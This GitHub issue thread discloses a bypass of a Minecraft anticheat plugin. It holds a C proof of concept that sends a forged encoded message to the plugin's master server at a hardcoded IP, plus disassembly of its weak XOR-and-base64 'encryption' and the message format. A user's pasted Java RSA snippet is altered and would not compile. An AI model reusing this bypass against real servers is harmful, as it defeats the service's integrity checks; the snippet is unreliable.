### ISSUE TITLE
[ByPass] Anticheat is bypassable :)

### ISSUE THREAD

**Issue by WolverinDEV** [Lubenica98/FairPlayMinecraft#109]
![Image](https://sc-cdn.scaleengine.net/i/3716b07bc2477810a662096317cca7dc.png)

**Comment by Lubenica98** [comment]
Do you mind telling how you bypassed the check?

**Comment by WolverinDEV** [comment]
A very bad example (Just for showing how easy it it)
```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void error(const char *msg) {
    perror(msg);
    exit(0);
}

int main(int argc, char *argv[]) {
    int sockfd, portno, n;
    struct sockaddr_in serv_addr;
    struct hostent *server;

    char buffer[1630];
    portno = 4135;
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        error("ERROR opening socket");
    server = gethostbyname("51.254.37.166");
    if (server == NULL) {
        fprintf(stderr, "ERROR, no such host\n");
        exit(0);
    }
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *) server->h_addr,
          (char *) &serv_addr.sin_addr.s_addr,
          server->h_length);
    serv_addr.sin_port = htons(portno);
    if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0)
        error("ERROR connecting");


    /**
0000   3b 41 79 42 52 44 41 38 41 43 7a 68 58 58 77 73  ;AyBRDA8ACzhXXws
0010   2b 5a 58 49 4f 56 46 39 33 48 42 35 57 66 68 67  +ZXIOVF93HB5Wfhg
0020   42 64 6c 35 53 64 41 41 59 56 32 67 59 25 0a     Bdl5SdAAYV2gY%.
     */
    strcpy(buffer, ";AyBRDA8ACzhXXws+ZXIOVF93HB5WfhgBdl5SdAAYV2gY%\x0a");
    n = write(sockfd, buffer, strlen(buffer));
    if (n < 0) error("ERROR writing to socket");
    bzero(buffer, 256);

    read(sockfd, buffer, 1440 + 190);
    usleep(1000 * 100);

    strcpy(buffer, ";Yw==%\x0a");
    n = write(sockfd, buffer, strlen(buffer));
    if (n < 0) error("ERROR writing to socket");
    bzero(buffer, 256);
    close(sockfd);
    return 0;
}
```

PS:
You have a nice encription Methode:
```
0x0000000000403db5         mov        qword [rbx+8], r13                        ; CODE XREF=encriptMessage(string)+393, encriptMessage(string)+410
0x0000000000403db9         mov        byte [rax+r13], 0x0
0x0000000000403dbe         cmp        qword [r12+8], 0x0
0x0000000000403dc4         je         loc_403e14

0x0000000000403dc6         mov        eax, 0x62
0x0000000000403dcb         xor        ecx, ecx
0x0000000000403dcd         movabs     rdi, 0xcccccccccccccccd
0x0000000000403dd7         jmp        loc_403dfc
0x0000000000403dd9         nop        dword [rax]

                       loc_403de0:
0x0000000000403de0         mov        rax, rcx                                  ; CODE XREF=encriptMessage(string)+258
0x0000000000403de3         mov        rsi, rcx
0x0000000000403de6         mul        rdi
0x0000000000403de9         shr        rdx, 0x3
0x0000000000403ded         lea        rax, qword [rdx+rdx*4]
0x0000000000403df1         add        rax, rax
0x0000000000403df4         sub        rsi, rax
0x0000000000403df7         movzx      eax, byte [rsp+rsi+0x58+var_28]

                       loc_403dfc:
0x0000000000403dfc         mov        rsi, qword [r12]                          ; CODE XREF=encriptMessage(string)+199
0x0000000000403e00         mov        rdx, qword [rbx]
0x0000000000403e03         xor        al, byte [rsi+rcx]
0x0000000000403e06         mov        byte [rdx+rcx], al
0x0000000000403e09         add        rcx, 0x1
0x0000000000403e0d         cmp        qword [r12+8], rcx
0x0000000000403e12         ja         loc_403de0

                       loc_403e14:
0x0000000000403e14         mov        edx, dword [rbx+8]                        ; CODE XREF=encriptMessage(string)+180
0x0000000000403e17         mov        rsi, qword [rbx]
0x0000000000403e1a         lea        rdi, qword [rsp+0x58+var_48]
0x0000000000403e1f         call       _Z13base64_encodeB5cxx11PKhj              ; base64_encode[abi:cxx11](unsigned char const*, unsigned int)
0x0000000000403e24         lea        rsi, qword [rsp+0x58+var_48]
0x0000000000403e29         mov        rdi, rbx
0x0000000000403e2c         call       basic_string::swap()
0x0000000000403e31         mov        rdi, qword [rsp+0x58+var_48]
0x0000000000403e36         lea        rax, qword [rsp+0x58+var_38]
0x0000000000403e3b         cmp        rdi, rax
0x0000000000403e3e         je         loc_403e45
```
it isnt verry stong so it isnt hard to create the base 64 string by myself with an costume host and port and username (app;<username>;<host>:<port>)

**Comment by WolverinDEV** [comment]
Hey why did you removed my informations :dagger: I didnt gave any pseudocode about your "encription" so nobody can recreate the base65 string for hisself xD

haha lul

**Comment by midnjerry** [comment]
I was looking to write this type of plugin myself, but am elated to have found yours.  I don't know what WolverinDEV means by "encription"....  but I wonder if he used this code to crack it?

public boolean verifySignature(String sign, String challenge) throws NoSuchAlgorithmException,
			InvalidKeySpecException, NoSuchProviderException, InvalidKeyException, SignatureException {
		BigInteger modulus = new BigInteger(3029380238402384082309840238402384092340);
		BigInteger pubExp = new BigInteger("21");
		KeyFactory keyFactory = KeyFactory.getInstance("RSA");
		RSAPublicKeySpec pubKeySpec = new RSAPublicKeySpec(modulus, pubExp);
		PublicKey pubKey = keyFactory.generatePublic(pubKeySpec);
		byte[] sigToVerify = FairCraft.toByteArray(sign);
		Signature sig = Signature.getInstance("SHA1withRSA");
		sig.initVerify(pubKey);
		sig.update(challenge.getBytes());
		boolean verifies = sig.verify(sigToVerify);
		return verifies;
	}

I acquired this from the original FairCraft jar that is freely downloadable from bukkit.  I thought the project was abandoned so I reversed it to see how the author did it.  I changed the values for modulus and pubExp.

Anyway, this is how they work with encryption.  FYI.

**Comment by WolverinDEV** [comment]
@midnjerry 
Hey,
well i only took a look about the client not about the server side stuff.
The problem here is that the encryption method whitch encripts the data whtch then the master server gets isnt so hard to understand and you can reproduce the data which the client sends if you're not playing with mods or cheats.

**Comment by midnjerry** [comment]
Oh I see.... well do you think the encryption method I included above would make the code harder to break?  It's using RSA encryption.  Would you be able to break it with the algorithm above?

**Comment by WolverinDEV** [comment]
@midnjerry 
The algorithm which you posted above isnt still not the best, because of the hardcoded key.
Well you can find a lots of techniques which are much stronger. (Still based on RSA, but without a hardcoded key, so its much harder to find the valid key for recreating the encripted data.)

**Comment by midnjerry** [comment]
Oh I see... but how would the client and server know what key to use.  Lubenica98 PLEASE fix this.  I want to buy your plugin!!!!!

**Comment by WolverinDEV** [comment]
@midnjerry @Lubenica98 
Okey i feeled a little bit bored and i got a challenge that i cant reverse engineer the full encryption method while im drunk but i solved it and here it is: https://github.com/WolverinDEV/ReverseFPMC

**Comment by midnjerry** [comment]
Dang it.  All of the legwork was done by Lubencia.  Wolverin, help out.  Using the code I provided above, how would you sync the two the way you stated before.  I guess the problem is that the host and client both need to know ahead of time how to build the public key?

how does bitcoin do it?  lol.

**Comment by WolverinDEV** [comment]
Bitcoint dosnt have any parallels with encripting. A bitcoin is just a hash witch fit into some rules. (https://de.bitcoin.it/wiki/Block)

**Comment by Janmm14** [comment]
*encryption *encrypting *encrypt

**Comment by Lubenica98** [comment]
WolverinDEV offered to help so this will be sorted out anytime soon @midnjerry
